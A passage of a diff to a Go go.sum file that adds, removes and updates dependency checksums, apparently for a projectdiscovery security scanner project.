github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= github.com/huandu/xstrings v1.3.2 h1:L18LIDzqlW6xN2rEkpdV8+oL/IXWJ1APd+vsdYy4Wdw= github.com/huandu/xstrings v1.3.2/go.mod h1:y5/lhBue+AyNmUVz9RLU9xbLR0o4KIIExikq4ovT0aE= github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/itchyny/go-flags v1.5.0/go.mod h1:lenkYuCobuxLBAd/HGFE4LRoW8D3B6iXRQfWYJ+MNbA= +github.com/itchyny/gojq v0.12.4 h1:8zgOZWMejEWCLjbF/1mWY7hY7QEARm7dtuhC6Bp4R8o= +github.com/itchyny/gojq v0.12.4/go.mod h1:EQUSKgW/YaOxmXpAwGiowFDO4i2Rmtk5+9dFyeiymAg= +github.com/itchyny/timefmt-go v0.1.3 h1:7M3LGVDsqcd0VZH2U+x393obrzZisp7C0uEe921iRkU= +github.com/itchyny/timefmt-go v0.1.3/go.mod h1:0osSSCQSASBJMsIZnhAaF1C2fCBTJZXrnj37mG8/c+A= github.com/jasonlvhit/gocron v0.0.1 h1:qTt5qF3b3srDjeOIR4Le1LfeyvoYzJlYpqvG7tJX5YU= github.com/jasonlvhit/gocron v0.0.1/go.mod h1:k9a3TV8VcU73XZxfVHCHWMWF9SOqgoku0/QlY2yvlA4= +github.com/jmespath/go-jmespath v0.0.0-20180206201540-c2b33e8439af/go.mod h1:Nht3zPeWKUH0NzdCt2Blrr5ys8VGpn0CEB0cQHVjt7k= +github.com/jpillora/backoff v0.0.0-20180909062703-3050d21c67d7/go.mod h1:2iMrUgbbvHEiQClaW2NsSzMyGHqN+rDFqY705q49KG0= github.com/json-iterator/go v1.1.10 h1:Kz6Cvnvv2wGdaG/V8yMvfkmNiXq9Ya2KUv4rouJJr68= github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= @@ -178,7 +213,15 @@ github.com/karlseguin/expect v1.0.2-0.20190806010014-778a5f0c6003/go.mod h1:zNBx github.com/karrick/godirwalk v1.16.1 
h1:DynhcF+bztK8gooS0+NDJFrdNZjJ3gzVzC545UNA9iw= github.com/karrick/godirwalk v1.16.1/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= +github.com/klauspost/compress v1.4.1 h1:8VMb5+0wMgdBykOV96DwNwKFQ+WTI4pzYURP99CcB9E= +github.com/klauspost/compress v1.4.1/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= +github.com/klauspost/cpuid v1.2.0 h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE= +github.com/klauspost/cpuid v1.2.0/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= +github.com/klauspost/pgzip v1.2.5 h1:qnWYvvKqedOF2ulHpMG72XQol4ILEJ8k2wwRl/Km8oE= +github.com/klauspost/pgzip v1.2.5/go.mod h1:Ch1tH69qFZu15pkjo5kYi6mth2Zzwzt50oCQKQE9RUs= +github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= +github.com/kr/pretty v0.2.0/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI= github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= @@ -188,17 +231,22 @@ github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= github.com/logrusorgru/aurora v0.0.0-20200102142835-e9ef32dff381/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8= github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= +github.com/mattn/go-colorable v0.1.1/go.mod h1:FuOcm+DKB9mbwrcAfNl7/TZVBZ6rcnceauSikq3lYCQ= +github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= +github.com/mattn/go-isatty v0.0.5/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.13 h1:qdl+GuBjcsKKDco5BsxPJlId98mSWNKqYA+Co0SC1yA= +github.com/mattn/go-isatty v0.0.13/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.10 h1:CoZ3S2P7pvtP45xOtBw+/mDL2z0RKI576gSkzRRpdGg= github.com/mattn/go-runewidth v0.0.10/go.mod h1:RAqKPSqVFrSLVXbA8x7dzmKdmGzieGRCM46jaSJTDAk= +github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= github.com/miekg/dns v1.1.29/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.35/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.38/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.41 h1:WMszZWJG0XmzbK9FEmzH2TVcqYzFesusSIB41b8KHxY= github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= -github.com/mitchellh/go-ps v1.0.0 h1:i6ampVEEF4wQFF+bkYfwYgY+F/uYJDktmvLPf7qIgjc= -github.com/mitchellh/go-ps v1.0.0/go.mod h1:J4lOc8z8yJs6vUwklHw2XEIiT4z4C40KtWVN3nvg8Pg= github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg= 
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= @@ -213,39 +261,44 @@ github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+W github.com/onsi/ginkgo v1.10.1 h1:q/mM8GF/n0shIN8SaAZ0V+jnLPzen6WIVZdiwrRlMlo= github.com/onsi/ginkgo v1.10.1/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= +github.com/onsi/gomega v1.5.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= github.com/onsi/gomega v1.7.0 h1:XPnZz8VVBHjVsy1vzJmRwIcSwiUO+JFfrv/xGiigmME= github.com/onsi/gomega v1.7.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= +github.com/owenrumney/go-sarif v1.0.4 h1:0LFC5eHP6amc/9ajM1jDiE52UfXFcl/oozay+X3KgV4= +github.com/owenrumney/go-sarif v1.0.4/go.mod h1:DXUGbHwQcCMvqcvZbxh8l/7diHsJVztOKZgmPt88RNI= github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/projectdiscovery/clistats v0.0.8 h1:tjmWb15mqsPf/yrQXVHLe2ThZX/5+mgKSfZBKWWLh20= github.com/projectdiscovery/clistats v0.0.8/go.mod h1:lV6jUHAv2bYWqrQstqW8iVIydKJhWlVaLl3Xo9ioVGg= -github.com/projectdiscovery/collaborator v0.0.2 h1:BSiMlWM3NvuKbpedn6fIjjEo5b7q5zmiJ6tI7+6mB3s= -github.com/projectdiscovery/collaborator v0.0.2/go.mod h1:J1z0fC7Svutz3LJqoRyTHA3F0Suh4livmkYv8MnKw20= github.com/projectdiscovery/fastdialer v0.0.9 h1:B06bwNwb9IpOwyb8L/ClwLBAmyRtRhsoX9lxUo0c6Sk= github.com/projectdiscovery/fastdialer v0.0.9/go.mod h1:zczVWqNjiTIWk/1IrpFR/kU2nKKHoH9rHBe68/OmpoU= -github.com/projectdiscovery/goflags v0.0.4 h1:fWKLMAr3KmPlZxE1b54pfei+vGIUJn9q6aM7woZIbCY= -github.com/projectdiscovery/goflags v0.0.4/go.mod h1:Ae1mJ5MIIqjys0lFe3GiMZ10Z8VLaxkYJ1ySA4Zv8HA= +github.com/projectdiscovery/goflags v0.0.6 h1:4ErduTfSC55cRR3TmUg+TQirBlCuBdBadrluAsy1pew= +github.com/projectdiscovery/goflags v0.0.6/go.mod h1:Ae1mJ5MIIqjys0lFe3GiMZ10Z8VLaxkYJ1ySA4Zv8HA= github.com/projectdiscovery/gologger v1.1.3/go.mod h1:jdXflz3TLB8bcVNzb0v26TztI9KPz8Lr4BVdUhNUs6E= github.com/projectdiscovery/gologger v1.1.4 h1:qWxGUq7ukHWT849uGPkagPKF3yBPYAsTtMKunQ8O2VI= github.com/projectdiscovery/gologger v1.1.4/go.mod h1:Bhb6Bdx2PV1nMaFLoXNBmHIU85iROS9y1tBuv7T5pMY= github.com/projectdiscovery/hmap v0.0.1 h1:VAONbJw5jP+syI5smhsfkrq9XPGn4aiYy5pR6KR1wog= github.com/projectdiscovery/hmap v0.0.1/go.mod h1:VDEfgzkKQdq7iGTKz8Ooul0NuYHQ8qiDs6r8bPD1Sb0= -github.com/projectdiscovery/interactsh v0.0.2 h1:v2gsHQbuMKu0OxK+PEduKR7lRQFsdNSZjxmI7iRa46g= -github.com/projectdiscovery/interactsh v0.0.2/go.mod h1:dWnKO14d2FLP3kLhI9DecEsiAC/aZiJoUBGFjGhDskY= +github.com/projectdiscovery/interactsh v0.0.3 h1:PUkWk+NzSyd5glMqfORmuqizhsd7c3WdTYBOto/MQIU= +github.com/projectdiscovery/interactsh v0.0.3/go.mod h1:dWnKO14d2FLP3kLhI9DecEsiAC/aZiJoUBGFjGhDskY= github.com/projectdiscovery/mapsutil v0.0.1 h1:hXIQUPvU+5HtPzzyaLvsPg4R/39N77CCAL0ezYhFdgw= github.com/projectdiscovery/mapsutil v0.0.1/go.mod h1:Q49P7sQzz9m+dWgdx/ryNwOfsClt8ZmHhF4WdXTheyE= -github.com/projectdiscovery/rawhttp v0.0.6 h1:HbgPB1eKXQVV5F9sq0Uxflm95spWFyZYD8dgFpeOC9M= 
-github.com/projectdiscovery/rawhttp v0.0.6/go.mod h1:PQERZAhAv7yxI/hR6hdDPgK1WTU56l204BweXrBec+0= +github.com/projectdiscovery/rawhttp v0.0.7 h1:5m4peVgjbl7gqDcRYMTVEuX+Xs/nh76ohTkkvufucLg= +github.com/projectdiscovery/rawhttp v0.0.7/go.mod h1:PQERZAhAv7yxI/hR6hdDPgK1WTU56l204BweXrBec+0= github.com/projectdiscovery/retryabledns v1.0.8-0.20210226233812-ee2ecc9839d9/go.mod h1:4sMC8HZyF01HXukRleSQYwz4870bwgb4+hTSXTMrkf4= github.com/projectdiscovery/retryabledns v1.0.10 h1:xJZ2aKoqrNg/OZEw1+4+QIOH40V/WkZDYY1ZZc+uphE= github.com/projectdiscovery/retryabledns v1.0.10/go.mod h1:4sMC8HZyF01HXukRleSQYwz4870bwgb4+hTSXTMrkf4= -github.com/projectdiscovery/retryablehttp-go v1.0.1 h1:V7wUvsZNq1Rcz7+IlcyoyQlNwshuwptuBVYWw9lx8RE= github.com/projectdiscovery/retryablehttp-go v1.0.1/go.mod h1:SrN6iLZilNG1X4neq1D+SBxoqfAF4nyzvmevkTkWsek= +github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727 h1:CJHP3CLCc/eqdXQEvZy8KiiqtAk9kEsd1URtPyPAQ1s= +github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727/go.mod h1:dx//aY9V247qHdsRf0vdWHTBZuBQ2vm6Dq5dagxrDYI= github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7 h1:FxVoSHBcadJDy+Wd87fsmObqdtXYfv4+BscJyPLPFY0= github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7/go.mod h1:pkTOha1+gO0swnt38r2sg3+8D2ANPrA+wID3cjsY39s= +github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d h1:nlOAex7twmrEqD5i6WLnugF9uO3DQ6jDEKN9gevrTAk= +github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d/go.mod h1:TVSdZC0rRQeMIbsNSiGPhbmhyRtxqqtAGA9JiiNp2r4= github.com/prologic/smtpd v0.0.0-20210126001904-0893ad18168e h1:ZT3wZ92sp/EHEE/HcFCWCsYS3ROLjHb6EqSX8qYrgXw= github.com/prologic/smtpd v0.0.0-20210126001904-0893ad18168e/go.mod h1:GkLsdH1RZj6RDKeI9A05NGZYmEZQ/PbQcZPnZoSZuYI= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= @@ -254,11 +307,18 @@ github.com/remeh/sizedwaitgroup v1.0.0/go.mod h1:3j2R4OIe/SeS6YDhICBy22RWjJC5eNC github.com/rivo/uniseg v0.1.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.2.0 h1:S1pD9weZBuJdFmowNwbpi7BJ8TNftyUImj/0WQi72jY= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= +github.com/rogpeppe/fastuuid v1.1.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/rs/xid v1.2.1 h1:mhH9Nq+C1fY2l1XIpgxIiUOfNpRBYH1kKcr+qfKgjRc= github.com/rs/xid v1.2.1/go.mod h1:+uKXf+4Djp6Md1KODXJxgGQPKngRmWyn10oCKFzNHOQ= github.com/segmentio/ksuid v1.0.3 h1:FoResxvleQwYiPAVKe1tMUlEirodZqlqglIuFsdDntY= github.com/segmentio/ksuid v1.0.3/go.mod h1:/XUiZBD3kVx5SmUOl55voK5yeAbBNNIed+2O73XgrPE= +github.com/sergi/go-diff v1.0.0/go.mod h1:0CfEIISq7TuYL3j771MWULgwwjU+GofnZX9QAmXWZgo= +github.com/shirou/gopsutil/v3 v3.21.5 h1:YUBf0w/KPLk7w1803AYBnH7BmA+1Z/Q5MEZxpREUaB4= +github.com/shirou/gopsutil/v3 v3.21.5/go.mod h1:ghfMypLDrFSWN2c9cDYFLHyynQ+QUht0cv/18ZqVczw= +github.com/smartystreets/assertions v1.0.0/go.mod h1:kHHU4qYBaI3q23Pp3VPrmWhuIUrLW/7eUrw0BU5VaoM= +github.com/smartystreets/go-aws-auth v0.0.0-20180515143844-0c1422d1fdb9/go.mod h1:SnhjPscd9TpLiy1LpzGSKh3bXCfxxXuqd9xmQJy3slM= +github.com/smartystreets/gunit v1.0.0/go.mod h1:qwPWnhz6pn0NnRBP++URONOVyNkPyr4SauJk4cUOwJs= github.com/spaolacci/murmur3 v1.1.0 h1:7c1g84S4BPRrfL5Xrdp6fOJ206sU9y293DDHaoy0bLI= github.com/spaolacci/murmur3 v1.1.0/go.mod 
h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA= github.com/spf13/cast v1.3.1 h1:nFm6S0SMdyzrzcmThSipiEubIDy8WEXKNZ0UOgiRpng= @@ -273,13 +333,31 @@ github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5Cc github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/syndtr/goleveldb v1.0.0 h1:fBdIW9lB4Iz0n9khmH8w27SJ3QEJ7+IgjPEwGSZiFdE= github.com/syndtr/goleveldb v1.0.0/go.mod h1:ZVVdQEZoIme9iO1Ch2Jdy24qqXrMMOU6lpPAyBWyWuQ= +github.com/tj/assert v0.0.0-20171129193455-018094318fb0/go.mod h1:mZ9/Rh9oLWpLLDRpvE+3b7gP/C2YyLFYxNmcLnPTMe0= +github.com/tj/assert v0.0.3 h1:Df/BlaZ20mq6kuai7f5z2TvPFiwC3xaWJSDQNiIS3Rk= +github.com/tj/assert v0.0.3/go.mod h1:Ne6X72Q+TB1AteidzQncjw9PabbMp4PBMZ1k+vd1Pvk= +github.com/tj/go-buffer v1.1.0/go.mod h1:iyiJpfFcR2B9sXu7KvjbT9fpM4mOelRSDTbntVj52Uc= +github.com/tj/go-elastic v0.0.0-20171221160941-36157cbbebc2/go.mod h1:WjeM0Oo1eNAjXGDx2yma7uG2XoyRZTq1uv3M/o7imD0= +github.com/tj/go-kinesis v0.0.0-20171128231115-08b17f58cb1b/go.mod h1:/yhzCV0xPfx6jb1bBgRFjl5lytqVqZXEaeqWP8lTEao= +github.com/tj/go-spin v1.1.0/go.mod h1:Mg1mzmePZm4dva8Qz60H2lHwmJ2loum4VIrLgVnKwh4= +github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible h1:guTq1YxwB8XSILkI9q4IrOmrCOS6Hc1L3hmOhi4Swcs= +github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible/go.mod h1:waFwwyiAhGey2e+dNoYQ/iLhIcFqhCW7zL/+vDU1WLo= +github.com/tklauser/go-sysconf v0.3.4 h1:HT8SVixZd3IzLdfs/xlpq0jeSfTX57g1v6wB1EuzV7M= +github.com/tklauser/go-sysconf v0.3.4/go.mod h1:Cl2c8ZRWfHD5IrfHo9VN+FX9kCFjIOyVklgXycLB6ek= +github.com/tklauser/numcpus v0.2.1 h1:ct88eFm+Q7m2ZfXJdan1xYoXKlmwsfP+k88q05KvlZc= +github.com/tklauser/numcpus v0.2.1/go.mod h1:9aU+wOc6WjUIZEwWMP62PL/41d65P+iks1gBkr4QyP8= github.com/trivago/tgo v1.0.1/go.mod h1:w4dpD+3tzNIIiIfkWWa85w5/B77tlvdZckQ+6PkFnhc= github.com/trivago/tgo v1.0.7 h1:uaWH/XIy9aWYWpjm2CU3RpcqZXmX2ysQ9/Go+d9gyrM= github.com/trivago/tgo v1.0.7/go.mod h1:w4dpD+3tzNIIiIfkWWa85w5/B77tlvdZckQ+6PkFnhc= +github.com/ulikunitz/xz v0.5.6/go.mod h1:2bypXElzHzzJZwzH67Y6wb67pO62Rzfn7BSiF4ABRW8= +github.com/ulikunitz/xz v0.5.10 h1:t92gobL9l3HE202wg3rlk19F6X+JOxl9BBrCCMYEYd8= +github.com/ulikunitz/xz v0.5.10/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= github.com/valyala/fasttemplate v1.2.1 h1:TVEnxayobAdVkhQfrfes2IzOB6o+z4roRkPF52WA1u4= github.com/valyala/fasttemplate v1.2.1/go.mod h1:KHLXt3tVN2HBp8eijSv/kGJopbvo7S+qRAEEKiv+SiQ= +github.com/vmihailenco/msgpack/v4 v4.3.12/go.mod h1:gborTTJjAo/GWTqqRjrLCn9pgNN+NXzzngzBKDPIqw4= +github.com/vmihailenco/tagparser v0.1.1/go.mod h1:OeAg3pn3UbLjkWt+rN9oFYB6u/cQgqMEUPoW2WPyhdI= github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0 h1:3UeQBvD0TFrlVjOeLOBz+CPAI8dnbqNSVwUwRrkp7vQ= github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0/go.mod h1:IXCdmsXIht47RaVFLEdVnh1t+pgYtTAhQGj73kz+2DM= github.com/xanzy/go-gitlab v0.47.0 h1:nC35CNaGr9skHkJq1HMYZ58R7gZsy7SO37SkA2RIHbM= @@ -297,6 +375,8 @@ github.com/ysmood/leakless v0.6.14/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNq github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/zclconf/go-cty v1.8.2 
h1:u+xZfBKgpycDnTNjPhGiTEYZS5qS/Sb5MqSfm7vzcjg= +github.com/zclconf/go-cty v1.8.2/go.mod h1:vVKLxnk3puL4qRAv72AO+W99LUD4da90g3uUAzyuvAk= go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= go.opencensus.io v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= @@ -320,8 +400,6 @@ golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201002170205-7f63de1d35b0/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201112155050-0c6587e931a9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201221181555-eec23a3978ad/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= -golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 h1:It14KIkyBFYkHkwZ7k45minvA9aorojkyjGk9KJ5B/w= -golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= @@ -383,8 +461,8 @@ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81R golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= -golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4 h1:b0LrWgu8+q7z4J+0Y3Umo5q1dL7NXBkKBWkaVkAq17E= -golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4/go.mod h1:RBQZq4jEuRlivfhVLdyRGr576XBO4/greRjx4P4O3yc= +golang.org/x/net v0.0.0-20210521195947-fe42d452be8f h1:Si4U+UcgJzya9kpiEUJKQvjr512OLli+gL4poHrz93U= +golang.org/x/net v0.0.0-20210521195947-fe42d452be8f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -406,6 +484,7 @@ golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJ golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -419,6 +498,7 @@ golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod 
h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod 